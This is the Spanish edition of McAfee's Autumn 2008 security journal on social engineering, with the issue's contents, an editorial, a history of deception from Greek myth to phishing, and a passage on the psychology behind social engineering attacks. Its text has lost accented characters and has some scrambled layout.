Perspectiva sobre seguridad de McAfee Avert Labs Otoo de 2008

IngenIera socIal la principal amenaza de seguridad del mundo

Troyanos, falsos clic y anuncios de dinero fcil son algunos de los vectores utilizados por los creadores de malware para aprovecharse de los usuarios de Internet

McAfee Security Journal otoo 2008

ndice

Redactor jefe Dan sommer Colaboradores anthony Bettini Hiep Dang Benjamin edelman elodie grandjean Jeff green aditya Kapoor rahul Kashyap Markus Jacobsson Karthik raman craig schmugar Estadsticas Toralv Dirro shane Keats David Marcus Franois Paget craig schmugar Ilustrador Doug ross Diseo PaIr Design, llc Agradecimientos Muchas personas han contribuido a la creacin de este nmero de McAfee Security Journal. citaremos nicamente algunos de los colaboradores ms destacados: los directivos de Mcafee, Inc. y Mcafee avert labs que han prestado su apoyo a esta creacin; nuestro equipo de revisorescarl Banzhof, Hiep Dang, David Marcus, craig schmugar, anna stepanov y Joe Telafici; nuestros autores y sus jefes y compaeros que les han aportado sus ideas y comentarios; los especialistas en marketing cari Jaquet, Mary Karlton, Beth Martinez y Jennifer natwick; el especialista en relaciones pblicas Joris evers, su equipo internacional y red consultancy ltd.; nuestra agencia de diseo, Pair Design; nuestra imprenta, rr Donnelley, y Derrick Healy y su equipo en nuestra oficina de localizacin de cork, Irlanda, que ha coordinado la traduccin de esta publicacin a muchos idiomas. gracias a todos; esta publicacin no sera una realidad sin vuestra inestimable contribucin! Dan sommer redactor jefe

Los orgenes de la ingeniera social Desde el caballo de Troya de la odisea hasta el phishing en Internet: el eterno engao. Hiep Dang Pedid y se os dar la psicologa de la ingeniera social: Por qu funciona? Karthik Raman Ingeniera social 2.0: Y ahora qu? el fraude del clic se vislumbra como una de las amenazas ms importantes que deberemos afrontar en el futuro cercano. Markus Jakobsson Los Juegos Olmpicos de Pekn: Un objetivo perfecto para el malware de ingeniera social los Juegos olmpicos, junto con otros grandes eventos, constituyen una atraccin irresistible para los creadores de malware. Elodie Grandjean Vulnerabilidades en los mercados de valores Pueden los piratas informticos obtener ganancias del Martes de parches y otras noticias de las empresas? Anthony Bettini El futuro de los sitios de redes sociales la afluencia de usuarios y dinero convierte a los sitios sociales en un objetivo ms del malware. Craig Schmugar La nueva cara de las vulnerabilidades Trucos de ingeniera social pueden empujar a los usuarios a agujeros de software. Rahul Kashyap Typosquatting: Aventuras involuntarias de navegantes el navegante imprudente puede acabar en el lugar equivocado. Benjamin Edelman Qu ha sido del adware y el spyware? Una legislacin ms severa puede haber apaciguado el adware, pero los programas potencialmente no deseados (PUP) y troyanos siguen entre nosotros. Aditya Kapoor Estadsticas cul es el riesgo para los dominios de primer nivel? David Marcus

9 13

16

22

28

31 34

38

44

le ha gustado? no le ha gustado? enve sus comentarios a security_Journal@mcafee.com.

el debut de "Mcafee security Journal"

Jeff Green

Bienvenido al primer nmero de nuestra revista de seguridad McAfee Security Journal. aunque lo llamamos "primer nmero", en realidad no es la primera vez que realizamos esta publicacin. le hemos cambiado el nombre; hasta ahora era Anlisis de amenazas globales (gTr). en McAfee Security Journal, observar la actitud crtica de siempre, junto a todo el contenido dinmico que puede esperar de los mejores investigadores y autores en el campo de la investigacin de la seguridad informtica: los especialistas de Mcafee avert labs. en este nmero, abordamos el vector de ataque ms insidioso e invasivo de todos: la ingeniera social. Tibet libre! Nuevas imgenes de la III Guerra Mundial! Secretos para evadir impuestos! Nuevas tecnologas para ahorrar electricidad! Medicinas a buen precio a travs de Internet! y la lista podra seguir, pero creo que ha quedado claro. ahora ms que nunca el envo de mensajes seductores que lleguen a las vctimas potenciales es clave para el xito de los desarrolladores de malware y los ladrones de identidad. sin embargo, el uso de la ingeniera social como mtodo de estafa no es precisamente nuevo: existe desde que los humanos se comunican. T tienes algo que yo quiero. Te convenzo para que me lo des o para que hagas lo que yo quiero. el factor humano hace de la ingeniera social una de las amenazas ms difciles de combatir. es posible que la forma ms fcil de apoderarse de la identidad de otra persona sea simplemente pedrsela. Todas las tcnicas de ingeniera social estafas Ponzi, timos, estafas piramidales, fraudes sencillos, phishing o spam siguen patrones similares. ya sean fsicas o digitales, todas tienen elementos en comn. comparten el mismo objetivo y en muchos casos incluso emplean las mismas tcnicas. Todas pretenden manipular a las vctimas aprovechando un fallo en el hardware humano. Todas crean escenarios especialmente diseados para convencer a las vctimas de que divulguen determinada informacin o realicen una accin concreta. Hemos reunido a otro destacable grupo de investigadores y autores para analizar este tema y documentarlo para nuestros lectores. Incluso hemos incorporado una novedad a nuestra revista: ser la primera vez que contamos con colaboradores invitados. empezamos con dos de los mejores: el Dr. Markus Jacobsson del centro de investigacin Palo alto research center y el profesor Benjamin edelman de la universidad de estudios empresariales Harvard Business school.

empezaremos con una mirada retrospectiva a la historia del engao. a continuacin, analizaremos el trasfondo psicolgico de este tipo de ataques. Despus examinaremos la posible evolucin de la ingeniera social en los prximos aos. los Juegos olmpicos de Pekn de 2008 han terminado, y una vez ms los autores de malware han intentado engaar a los aficionados para que visitaran sitios Web falsos. se puede ganar dinero en la bolsa programando eventos como los Martes de parches de Microsoft o falsificando noticias de empresas? en nuestra exhaustiva investigacin hallarn una respuesta. y qu ocurrir a partir de ahora con los sitios de redes sociales? se reforzar la seguridad o estn condenados a convertirse en objetivos fciles debido a un exceso de confianza de los usuarios? Vamos a ver tambin cmo atacan los creadores de malware algunas vulnerabilidades del software y cmo aprovechan los errores cometidos al escribir el nombre de los sitios Web, tcnica conocida como typosquatting. nuestro artculo final dar una respuesta a la pregunta Qu ha pasado con el adware y el spyware? Terminaremos con algunos datos estadsticos que muestran cmo vara el porcentaje de amenazas dirigidas a dominios de nivel superior en todo el mundo. esperamos que encuentre este nmero tan interesante e inquietante como nosotros. gracias por acompaarnos de nuevo en nuestro viaje a las profundidades de la seguridad informtica.

Jeff Green es Vicepresidente primero de Mcafee avert labs y del departamento de Desarrollo de productos. es responsable a nivel mundial de toda la organizacin de investigacin de Mcafee, que se extiende por los continentes americano, europeo y asitico. su tarea es supervisar los equipos de investigacin que se ocupan de los virus, ataques dirigidos y ataques de piratas, spyware, spam, phishing, vulnerabilidades y parches, as como de las tecnologas de deteccin/prevencin de intrusiones en hosts y redes. adems, green lidera la investigacin sobre seguridad a largo plazo con el fin de garantizar que Mcafee vaya siempre un paso por delante de las amenazas emergentes.

oToo 2008

los orgenes de la ingeniera social

Hiep Dang

sera difcil hoy en da leer un artculo de prensa o un libro sobre seguridad informtica sin que apareciera el trmino ingeniera social ms de una vez.
Popularizada por Kevin Mitnick (posiblemente el ingeniero social ms tristemente famoso de la era informtica moderna), la ingeniera social es en esencia el arte de la persuasin: convencer a las personas para que revelen datos confidenciales o realicen alguna accin. aunque el trmino ingeniera social es relativamente nuevo, las tcnicas y filosofas que la sustentan estn presentes desde los albores de la humanidad. existen historias de engao y manipulacin en muchas pginas de la historia, el folclore, la mitologa, la religin y la literatura. ms de ingeniera social contra Zeus, Prometeo rob el brillo que se ve de lejos del infatigable fuego en una hueca caaheja del monte olimpos y se lo leg a los hombres. como castigo por sus actos, Prometeo fue encadenado a una roca, a la que cada da llegaba un guila que le coma el hgado; por la noche ste le volva a crecer. como castigo para los hombres, Zeus cre a la primera mujer, Pandora, quien portaba un nfora que ella abri por curiosidad, liberando incontables plagas.

el ataque de phishing de Jacob y rebeca Prometeo: el Dios de la ingeniera social?

segn la mitologa griega, el nivel de competencia actual del ser humano en la ingeniera social es probablemente resultado directo de su mayor mentor: Prometeo, cuyas habilidades le llevaron a creer que poda engaar a Zeus, el mayor de los dioses. en la Teogona y Trabajos y das, el poeta pico Hesodo narra la historia de Prometeo, un Titn conocido por sus maas y sus astutos ardides. se le atribuye la creacin del hombre, modelado a partir de barro. en lo que se conoce como el "engao de Mecona", Prometeo present a Zeus dos ofrendas para dirimir una disputa entre dioses y mortales. Una ofrenda era la carne de un buey metida en el interior de su estmago, la otra era el esqueleto del buey cubierto con brillante grasa. la una era alimento envuelto en cobertura vil mientras la otra era ofrenda incomestible, aunque muy tentadora a la vista. Zeus eligi la ltima y, como consecuencia, en lo sucesivo la humanidad debera sacrificar a los dioses slo huesos y grasa, conservando la carne para s. enojado por el engao de Prometeo, Zeus castig a los mortales quitndoles el fuego. sin embargo, en un acto Del antiguo Testamento proviene la historia de Jacob y su madre rebeca, quien utiliz una tcnica de ingeniera social que es la base de los actuales ataques de phishing: hacer creer a la vctima que el atacante es alguien diferente. el padre de Jacob y esposo de rebeca, Isaac, se qued ciego en los ltimos aos de su vida. Mientras se preparaba para morir, orden a su hijo mayor, esa: treme caza y preprame un buen guisado como a m me gusta y tremelo para que yo coma y que mi alma te bendiga antes que yo muera. (gnesis 27:2-4.) como quera que fuera Jacob en lugar de esa el que recibiera las bendiciones de Isaac, rebeca concibi un plan. Jacob, reacio al principio, dijo: "esa mi hermano es hombre velludo y yo soy lampio. Quiz mi padre me toque, y entonces ser para l un engaador y traer sobre m una maldicin y no una bendicin. (gnesis 27:11-12.) Para engaar a Isaac y hacerle creer que estaba con esa, rebeca prepar la comida de Isaac, visti a Jacob con las mejoras ropas de esa y le puso piel de cabrito en las partes lampias de las manos y el cuello. Jacob le entreg la comida a Isaac, super la prueba de autenticacin y consigui las bendiciones que deban ser para esa.

McaFee secUrITy JoUrnal

sansn y Dalila: espionaje a sueldo

sansn fue un personaje bblico de enorme fuerza que pele contra los filisteos. el secreto de su fuerza estaba en su largo cabello. estando en gaza, sansn se enamor de Dalila. los filisteos la convencieron para que averiguara el secreto de la fuerza de sansn a cambio de 1.100 monedas de plata. Persudelo, y ve dnde est su gran fuerza, y cmo podramos dominarlo para atarlo y castigarlo. entonces cada uno de nosotros te dar 1.100 monedas de plata. (Jueces 16:5.) sansn se resisti a desvelar su secreto antes de sucumbir a su capacidad de persuasin. as que ella le dijo: cmo puedes decir: 'Te quiero,' cuando tu corazn no est conmigo? Me has engaado tres veces y no me has declarado dnde reside tu gran fuerza. Finalmente, tras insistir y acosarlo da y noche, se rindi. De modo que le dijo: nunca ha pasado navaja sobre mi cabeza, pues he sido nazareo para Dios desde el vientre de mi madre. si me cortan el cabello, mi fuerza me dejar y me debilitar y ser como cualquier otro hombre. (Jueces 16:1517.) en cuanto sansn se durmi, Dalila se aprovech de su vulnerabilidad y le cort el pelo. Debilitado como qued, los filisteos prendieron a sansn, le sacaron los ojos, lo encadenaron y encarcelaron para siempre.

Oh miserables ciudadanos! Qu locura tan grande! Qu increble locura es sta? Pensis que se han alejado los Griegos de vuestras costas? As conocemos a Ulises? O en esa armazn de madera, hay gente aqui va oculta, o se ha fabricado en dao de nuestros muros, con objeto de explorar nuestras moradas y dominar desde su altura la ciudad, o algn otro engao esconde. No confiis en sus regalos, no creis en el caballo!
la falta de juicio de los troyanos fue su perdicin. esa noche, dirigidos por Ulises, los soldados griegos ocultos en el interior del caballo mataron a los guardias y abrieron las puertas al resto del ejrcito. gracias a la ingeniosa tctica de ingeniera social ideada por Ulises, los griegos derrotaron a los troyanos.

el primer caballo de Troya

la historia del caballo de Troya, famosa gracias a la obra pica del poeta griego Homero, la Odisea, y a la del poeta romano Virgilio, la Eneida, fue uno de los engaos de ingeniera social ms inteligentes de la historia de la humanidad. Durante la guerra de Troya, los griegos no pudieron derribar las murallas que circundaban la ciudad. el astuto guerrero griego Ulises concibi una estratagema para inducir a los troyanos a creer que los griegos haban abandonado el asedio de la ciudad. los griegos alejaron su flota de barcos y solo dejaron en la playa un gran caballo de madera junto con un soldado griego llamado sinn. Tras ser capturado por los troyanos, sinn les dijo que los griegos haban dejado el enorme caballo de madera como ofrenda a los dioses para garantizar su seguridad en el viaje de vuelta a casa y que lo haban hecho tan grande para que los troyanos no lo pudieran desplazar al interior de la ciudad, ya que ello les traera mala suerte a los griegos. el relato fue tan tentador que los troyanos introdujeron el caballo de madera tras las murallas de la ciudad, a pesar de los avisos de casandra, que fue maldita con la habilidad de predecir el futuro sin que nadie la creyera jams, y de laocoonte, un sacerdote troyano, quien en la Eneida exclam:

el caballo de Troya actual

cuando Ulises traz su plan para infiltrarse en Troya, poco imaginaba l que estaba sentando un precedente para los siglos venideros. el tipo de malware ms frecuente que se encuentra en la actualidad, el trmino "caballo de Troya" electrnico lo acu Daniel edwards de la agencia de seguridad nacional de estados Unidos en los aos setenta. edwards le puso ese nombre por la tcnica de ingeniera social utilizada por los griegos. antes de Internet, los usuarios de Pc que queran compartir archivos de software lo hacan mediante dispositivos fsicos (como discos flexibles o unidades de cinta) o conectndose a los sistemas de tabln de anuncios (BBs). los piratas informticos con fines malintencionados se dieron cuenta enseguida de que podan inducir a los usuarios a ejecutar un cdigo malintencionado sencillamente disfrazndolo como un juego o una utilidad. Debido a la simplicidad y efectividad de los troyanos, los creadores de malware todava emplean esta tcnica de ingeniera social siglos despus. en la actualidad, el nmero de usuarios de Pc que se dejan infectar con troyanos es alarmante. les atrae la tentacin de la msica, los vdeos, el software gratuitos y los simpticos mensajes electrnicos de annimos seres queridos.

oToo 2008

Crecimiento del malware y los programas PUP Distintas familias desde el ao 1997 al 2007 en miles

140 130 120 110 100 90 80 70 60 50 40 30 20 10 0 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007
Figura 1: La frecuencia de malware y programas potencialmente no deseados (PUP) en los archivos de firmas de McAfee ha tenido varios momentos lgidos en la ltima dcada. En 1998 entraron en escena los generadores de virus; en 2003 y 2004 se popularizaron los remitentes de correo masivo; en 2004 y 2005 aumentaron las redes de bots y en 2006 y 2007 despegaron los troyanos.

Virus y bots Troyanos PUP

Un timo actualizado
el fraude del pago por adelantado, ms conocido como timo nigeriano (timo 419), ha circulado durante dcadas y sigue siendo uno de los tipos de spam ms prolficos. el nmero 419 hace referencia a la seccin del cdigo Penal de nigeria que prohbe esta prctica. esta tctica de ingeniera social de enriquecimiento rpido lleg en forma de carta y empez a distribuirse por correo postal en los setenta. el timo evolucion hacia faxes no solicitados en los ochenta y, en la actualidad, se enva casi exclusivamente a travs del correo electrnico. sus orgenes se remontan al siglo diecisis, cuando se conoca como el timo del prisionero espaol. el plan es bien sencillo: se informa a una vctima ingenua sobre un prisionero espaol enormemente rico que necesita ayuda para ser liberado. este por as llamarlo prisionero contaba con que el estafador recaudara la cantidad necesaria para el rescate. el estafador abordaba a la vctima contndole la historia y permita que l o ella le ayudaran con una parte de la recaudacin de fondos, bajo la promesa de enormes ganancias. Hoy conocemos numerosas variantes de la carta, pero el concepto es el mismo. el timo nigeriano atrae a sus vctimas con la tentadora promesa de un pago multimillonario a cambio de una inversin de slo unos pocos miles de dlares. aunque la mayora de los receptores comprenden que la oferta es demasiado buena para ser cierta, aproximadamente un 1% de los destinatarios acaba respondiendo. segn los servicios secretos de ee. UU., los timadores estafaron a sus vctimas una media de 100 millones de dlares anuales.

McaFee secUrITy JoUrnal

Informes sobre casos de phishing En miles

60 50 40 30 20 10 0
Nov de 2003 Mayo de 2004 Nov de 2004 Mayo de 2005 Nov de 2005 Mayo de 2006 Nov de 2006 Mayo de 2007 Nov de 2007
Figura 2: Los informes sobre phishing muestran un crecimiento sostenido y el nmero de nuevos sitios de phishing se ha incrementado espectacularmente en los dos ltimos aos. (Fuente: AntiPhishing Working Group)

Informes de nuevos casos de phishing Nuevos sitios de phishing

Phishing
el trmino phishing fue acuado por los piratas informticos. Proviene de fishing (pesca) porque esta tcnica de ingeniera social engaa a sus vctimas para que desvelen sus nombres de usuario, contraseas, nmeros de tarjeta de crdito y otros datos personales. en los aos noventa, muchos piratas informticos se aprovecharon de las ofertas de prueba gratuita del servicio de Internet de america online (aol) utilizando nmeros falsos de tarjetas de crdito generados automticamente, que no se correspondan con cuentas reales. Despus de que aol mejorase su seguridad y las pruebas de validacin de tarjetas de crdito para garantizar que los nmeros de dichas tarjetas fueran legtimos, los malhechores se lanzaron a la bsqueda de nombres de usuario y contraseas reales para introducirse en las redes de aol. empezaron enviando correos electrnicos y mensajes instantneos falsos que parecan proceder del servicio tcnico de aol. Muchas vctimas desprevenidas facilitaron sus datos y a continuacin se les facturaron actividades y compras que los piratas informticos realizaron en sus cuentas. los cibercriminales enseguida se dieron cuenta del margen potencial de beneficios y la tasa de xito de tales ataques y dirigieron sus miradas a las empresas (bancos, eBay, amazon y otras) que realizaban transacciones comerciales electrnicas.

oToo 2008

Historia de la seguridad informtica

Comienzan a aparecer caballos de Troya en sistemas BBS. Se crea ARPANET (precursor de Internet). Se publica en ARPANET Creeper (el primer virus informtico). John von Neumann publica su teora del autmata autorreproductor. Se crea INTERNET a partir de ARPANET. Hace aparicin el spam (correo electrnico no solicitado), poco despus de que el pblico tuviera acceso a Internet. Dr. El Dr. Frederick Cohen publica Virus Informticos: teora y experimentos y reconoce a Leonard Adleman acuando el trmino virus informtico. McAfee Avert Labs se convierte en el primer equipo de respuesta de emergencia antivirus internacional de la industria. Se concibe el primer ataque de phishing para robar contraseas de usuarios de AOL. En la actualidad, McAfee Avert Labs protege a sus clientes contra virus, gusanos, troyanos, spyware, programas PUP; vulnerabilidades, spam, phishing, dominios malignos, intrusiones de red e intrusiones en host.

1948

1965

1969

1971

1978 1980 1982 1983 1984 1986 1988

1995 1996

2000 2002

2008

Aparece Elk Cloner (el primer virus para Apple). Se crea el correo electrnico. Se crea el primer sistema de tabln de anuncios (BBS) pblico. John Draper (alias Capn Crunch) descubre que un silbato de juguete que vena en una caja de cereales permite utilizar la red telefnica de forma ilegal.

Aparece el gusano Morris (el primer virus que se autorreplica). Aparece Brain (el primer virus para PC). Kevin Mitnick publica The Art of Deception (El arte del engao), en el que describe su dominio de la ingeniera social. Spyware y adware se convierten en trminos de uso comn.

La pelcula Juegos de guerra dramatiza sobre las consecuencias de la piratera.

Figura 3: Cronologa de los principales eventos de ingeniera social.

la historia se repite
ya se llame ingeniera social, artimaas, estafas, sesgos cognitivos o timos, el concepto de aprovecharse de la ingenuidad y la confianza de una persona es tan frecuente en la actualidad como lo ha sido desde los albores del tiempo. si se pregunta a expertos en seguridad, convendrn que las personas somos el eslabn ms dbil de la cadena de seguridad. Podemos desarrollar el software ms seguro que exista para proteger nuestros equipos, implantar las directivas de seguridad ms restrictivas e intentar lograr la utpica educacin del usuario. sin embargo, mientras sigamos dejndonos arrastrar por la curiosidad y la codicia sin preocuparnos de las consecuencias, correremos el riesgo de sufrir nuestra propia versin de una tragedia troyana. El progreso no consiste en cambio, sino que depende de la capacidad de retentiva. Cuando el cambio es absoluto, no quedan restos que mejorar ni direccin que definir para la posible mejora: y cuando la experiencia no se retiene, como ocurre entre salvajes, la infancia es perpetua. Aquellos que no recuerdan el pasado, estn condenados a repetirlo.George Santayana, en La razn en el sentido comn, de La vida de la razn o fases del progreso humano.
BIBLIOGRAfA
anderson, J. P. (1972). Computer Security Technology Planning Study vol. II. (estudio Mitnick, K. (2002). The Art of Deception. (el arte del engao) Indianapolis, Indiana:

Hiep Dang es director del departamento de Mcafee avert labs encargado de la investigacin de las aplicaciones de malware. es el responsable de la coordinacin del equipo mundial de investigadores de malware de Mcafee dedicado a la investigacin, anlisis y respuesta a los brotes de malware, incluyendo virus, gusanos, troyanos, bots y spyware. Dang escribe regularmente en los blogs y libros blancos de avert labs y en la publicacin McAfee Security Journal. Ha sido entrevistado por el Wall Street Journal, MsnBc, PC Magazine y otras muchas publicaciones y medios sobre las nuevas amenazas y las tendencias del malware. adems, Dang prctica con entusiasmo el Kung Fu de la Mantis religiosa del norte Wah lum Tam Tui y el Tai chi. en la actualidad se encuentra en un parntesis de su vida como formador concentrndose en la industria de la seguridad informtica.

sobre planificacin de tecnologa para la seguridad informtica) U.s. air Force. Farquhar, M. (2005). A Treasury of Deception. (Un tesoro de mentira) new york: The Penguin group. Hesodo (1914) Teogona. (Traduccin de a. Prez Jimnez) Hesodo (1914) Trabajos y das. (Traduccin de a. Prez Jimnez) Homero. La Ilada. (Traduccin de e. crespo)

Wiley Publishing.
Myers, M. J. (2007). Phishing and Countermeasures. (el phishing y las medidas

para combatirlo) John Wiley & sons, Inc.

santayana, g. (1905). La vida de la razn o fases del progreso humano, editorial Tecnos Virgilio (1993). La Eneida. (Traduccin de J. de echave sustaeta)

McaFee secUrITy JoUrnal

Pedid y se os dar
Karthik Raman

en enero de 2007, un grupo de ciberdelincuentes recurri a tcticas de ingeniera social para cometer el fraude online ms importante del mundo del que se tienen datos: el robo de 877.000 euros de clientes del banco sueco nordea Bank.
los clientes recibieron un correo electrnico supuestamente procedente del nordea Bank, y 250 descargaron e instalaron el software antispam tal como se les peda en el mensaje. en realidad, el software antispam era un troyano que recababa informacin de los clientes y que los delincuentes utilizaban para conectarse al sitio Web del banco y robar dinero1. segn un principio de seguridad universal, las personas son el punto dbil de todo sistema de seguridad. si bien los ataques contra la seguridad y las medidas de proteccin desarrolladas para responder a dichos ataques siguen evolucionando, la naturaleza humana permanece inalterable. Para un agresor informtico, la ingeniera social es ms eficaz y ofrece resultados ms rpidos que efectuar un ataque de fuerza bruta en algoritmos de cifrado, realizar pruebas con datos aleatorios para detectar nuevas vulnerabilidades de software o aumentar la complejidad del malware. Para los autores del fraude del nordea Bank era ms sencillo pedir a los clientes del banco que instalaran un troyano que entrar en una cmara acorazada para robar dinero. somos crdulos, codiciosos y curiosos, lo que significa que los ingenieros sociales pueden manipular nuestros sentimientos y pensamientos. nos piden algo y muy a menudo se lo damos. Pero, por qu nos comportamos de este modo? en un estudio pionero sobre la psicologa de la seguridad, el prestigioso experto en seguridad Bruce schneier identific cuatro reas de investigacineconoma del comportamiento, psicologa de la toma de decisiones, psicologa del riesgo y neurocienciaque pueden ayudar a explicar por qu nuestra sensacin de seguridad difiere de la realidad2. esta edicin de Mcafee security Journal y este artculo en concreto se centran en un aspecto de la seguridad: la ingeniera social. en este anlisis, recurriremos a la neurociencia, la psicologa de la toma de decisiones y la psicologa social bsica para analizar por qu nos dejamos embaucar por la ingeniera social sin percatarnos del engao.

Dos cerebros
el cerebro humano es posiblemente el sistema ms complejo del universo. Parte de su complejidad radica en su complicada estructura e intrincada interaccin de subsistemas. en el cerebro, las emociones parecen emerger de las partes internas ms antiguas, como la amgdala, y el razonamiento de las partes externas ms recientes, como el neocrtex3. Pero los centros de la emocin y la razn no son mutuamente excluyentes, como observ Isaac asimov en su libro El cerebro humano4: Segn parece, las emociones no surgen de una pequea parte del cerebro en particular, sino que muchas partes, incluidos los lbulos frontal y temporal del crtex, participan en una interaccin compleja. las partes del cerebro responsables de la emocin y la razn a veces pueden actuar en convergencia o en divergencia. ese es el motivo por el que nos resulta difcil mantener separadas razn y emocin, y por el que le resulta fcil a la emocin imponerse a la razn cuando ambas se contradicen. examinemos cmo nos enfrentamos al miedo, por ejemplo. al analizar cmo reaccionamos ante un peligro inminente, el escritor cientfico steven Johnson seala que la respuesta al miedo es una combinacin orquestal de instrumentos psicolgicos que se suceden con una velocidad y precisin magistrales5: Es lo que en lenguaje llano denominamos respuesta de lucha o huida. Sentir como se activa es uno de los mejores modos de percibir el cerebro y el cuerpo como un sistema autnomo que funciona independientemente de la voluntad consciente. cuando volvemos a experimentar las condiciones que desencadenaron una respuesta de lucha o huida en el pasado, nos rendimos a la respuesta emocional aunque podamos pensar de forma objetiva que la respuesta no est fundamentada.

oToo 2008

Polticos deshonestos, espas y estafadores saben que apelar a las emociones especialmente al miedo para provocar una respuesta emocional es un medio extremadamente eficaz para lograr sus fines. los ingenieros sociales mantienen viva esta tradicin.

Teoras de la ingeniera social

Manipulacin de las emociones
Muchos ingenieros sociales se centran en las emociones de miedo, curiosidad, codicia y compasin. es un hecho arraigado que estas emociones son universales; en algn momento, todos sentimos miedo o curiosidad o nos dejamos llevar por la codicia o la compasin. el miedo y la curiosidad son tiles en muchas situaciones. escapar de un edificio en llamas es algo positivo. la curiosidad puede ayudar a motivarnos y aprender algo nuevo. an as, actuar movidos por el miedo o la curiosidad puede empujarnos a hacer cosas peligrosas o no deseadas6. algunos ataques pueden perpetrarse incluso sin que el ingeniero social est presente, manipulando la curiosidad de una vctima. en abril de 2007, se dejaron en un aparcamiento de londres varias unidades UsB infectadas con un troyano bancario. los que no pudieron resistir la tentacin de saber qu contenan esas unidades, probablemente contentos por hacerse con un dispositivo de almacenamiento gratis, conectaron las unidades a sus equipos y los infectaron de malware7. los delincuentes que amenazan o chantajean a sus vctimas manipulan su miedo. el troyano gPcoder.i, que hizo su aparicin en junio de 2008, es un ejemplo de malware que manipulaba el miedo: cifraba los archivos de los usuarios y exiga un rescate a cambio de descifrarlos8. De igual forma, los delincuentes que sobornan a sus vctimas manipulan su codicia y los que fingen necesitar ayuda, su compasin.

Polticos deshonestos, espas y estafadores saben que apelar a las emociones especialmente al miedo para provocar una respuesta emocional es un medio extremadamente eficaz para lograr sus fines. Los ingenieros sociales mantienen viva esta tradicin.

clasificar las cosas en funcin de algunas caractersticas clave y luego responder de forma mecnica cuando alguna de estas caractersticas de activacin se manifiesta. analicemos cmo los ingenieros sociales pueden provocar en nosotros respuestas automticas que les beneficien.

Activacin de sesgos cognitivos

Un sesgo cognitivo es un error mental causado por una estrategia de procesamiento de la informacin simplificada10. cuando una heurstica falla, se convierte en un sesgo. los ingenieros sociales transforman nuestra heurstica en errores graves y sistemticos11. a continuacin se describen algunos sesgos cognitivos que pueden explicar la ingeniera social:

Sesgo de la eleccin comprensiva recordamos una eleccin que hemos hecho en el pasado con ms aspectos positivos que negativos12. Un internauta podra habituarse a comprar artculos con descuento en Internet a partir de recomendaciones de amigos. Un simple mensaje de spam podra parecer una recomendacin ms y llevar al comprador a proporcionar los datos de su tarjeta de crdito a un sitio Web fraudulento. Sesgo de confirmacin recabamos e interpretamos la informacin de modo que confirme nuestros puntos de vista13. Veamos un ejemplo hipottico. supongamos que acme corporation firma un contrato con Best Printers para el mantenimiento de sus impresoras y que el personal de servicio de Best Printers viste camisa gris de manga larga con placa de identificacin. con el tiempo, los empleados de acme se acostumbrarn a ver al personal de servicio de Best Printers con sus uniformes e identificarn a cualquier persona con una camisa gris de manga larga y una placa de identificacin como un tcnico. Un ingeniero social podra confeccionar o robar un uniforme de Best Printers para hacerse pasar por personal de servicio, y no ser conminado a identificarse debido al sesgo de confirmacin de los empleados de acme. Efecto de exposicin nos gustan las cosas (y otras personas) segn lo familiarizados que estemos con ellas14. las noticias sobre desastres naturales y provocados por el hombre a menudo dan pie a sitios Web de phishing que se aprovechan

Atajos mentales errneos

en ocasiones, los ingenieros sociales apelan a un elemento externo a nuestras emociones. Intentan alterar nuestras reglas mentales de procesamiento de la informacin, conocidas como heurstica o reglas generales. si bien hay que admitir que nuestra heurstica es falible, tambin hay que decir que no podemos funcionar sin ella. nuestras vidas seran demasiado complicadas si tuviramos que analizar detenidamente todo lo que percibimos, decimos o hacemos. necesitamos desesperadamente nuestros atajos mentales. el psiclogo robert cialdini explica esta necesidad9: No se puede pretender que reconozcamos y analicemos todos los aspectos de cada persona, circunstancia y situacin con las que nos encontramos incluso en un solo da. No disponemos de tiempo, energa ni capacidad para ello. Debemos recurrir muy a menudo a nuestros estereotipos, nuestras reglas generales, para

10

McaFee secUrITy JoUrnal

de ese sentimiento15. las personas expuestas a estas noticias podran ser fcilmente manipuladas para que visiten sitios Web de phishing que afirman guardar algn tipo de relacin con estas noticias. Por ltimo, su exposicin a las noticias podra hacerles bajar la guardia en relacin con la naturaleza maliciosa del sitio Web que estn visitando.

Anclaje las personas nos centramos en un rasgo de identificacin inicialmente manifiesto cuando tomamos decisiones sobre algo16. Un sitio Web falso de un banco que muestre ostensiblemente el logotipo especfico de la entidad puede engaar a los usuarios, aunque haya otros indicadores de seguridad que les alerten del engao17.

los medios de tergiversar el efecto de saliencia en su favor. se pueden hacer pasar por un cliente trajeado o por un guardia uniformado, pero nunca por un malabarista con zancos. la confusin no se limita exclusivamente a la vestimenta y al aspecto: tambin puede implicar conocer la jerga, ancdotas o empleados de una empresa, e incluso imitar acentos regionales. Un ingeniero social de Madrid que pretenda infiltrarse en una empresa de sevilla, puede saber que ana ha vuelto a ser madre o que Julio va a dejar la empresa para irse a la competencia, e intercambiar unas palabras al respecto con la recepcionista utilizando acento de sevilla con tal de conseguir acceso a las instalaciones como tcnico de mantenimiento. Conformidad, cumplimiento y obediencia respondemos a las presiones de conformidad, cumplimiento y obediencia alterando nuestro comportamiento. Muchos ataques de ingeniera social pueden explicarse a partir de las respuestas predecibles de las vctimas a estas presiones. Una ingeniera social podra hacerse pasar por una ejecutiva de visita y persuadir a un joven guardia de seguridad para que la dejara entrar en las instalaciones pese a no llevar placa de identificacin. (la promesa de la agresora en forma de recompensa o amenaza de castigo puede suponer otro elemento de presin para el guardia.) el guardia podra sentirse abrumado y obedecer. no se han registrado ataques de ingeniera social en grupo, pero son perfectamente viables. Varios ingenieros sociales podran hacerse pasar por empleados legtimos e incomodar a una recepcionista hasta conseguir que les dejara entrar en la oficina espetando frases como no nos haga perder el tiempo o Djenos hacer nuestro trabajo. la recepcionista simplemente podra dejarles pasar para no ganarse la antipata de los dems. otra tcnica distinta que se sabe que utilizan los espas es relacionarse durante un tiempo con la vctima. el agresor solicita en un primer momento informacin "inocente" a la vctima y posteriormente intenta sonsacarle informacin confidencial. la vctima se siente atrapada; presionada para satisfacer la siguiente solicitud, dado su historial de condescendencia, o se arriesga a sufrir algn tipo de chantaje.

Provocacin de errores en esquemas

los psiclogos sociales definen un esquema como la imagen de la realidad que utilizamos como referencia para poder extraer conclusiones sobre nuestro entorno. De nios, aprendemos que tratar bien a los dems es algo bueno. el reputado ingeniero social Kevin Mitnick seala que los agresores lo saben y elaboran una peticin para sus vctimas que parezca tan razonable que no levante sospechas, al tiempo que se valen de su confianza18. Por lo tanto, los ingenieros sociales se aprovechan del diseo de nuestro esquema social. a continuacin se incluye una lista de valoraciones o errores sociales comunes, con ejemplos de cmo los ingenieros sociales se aprovechan de ellos:

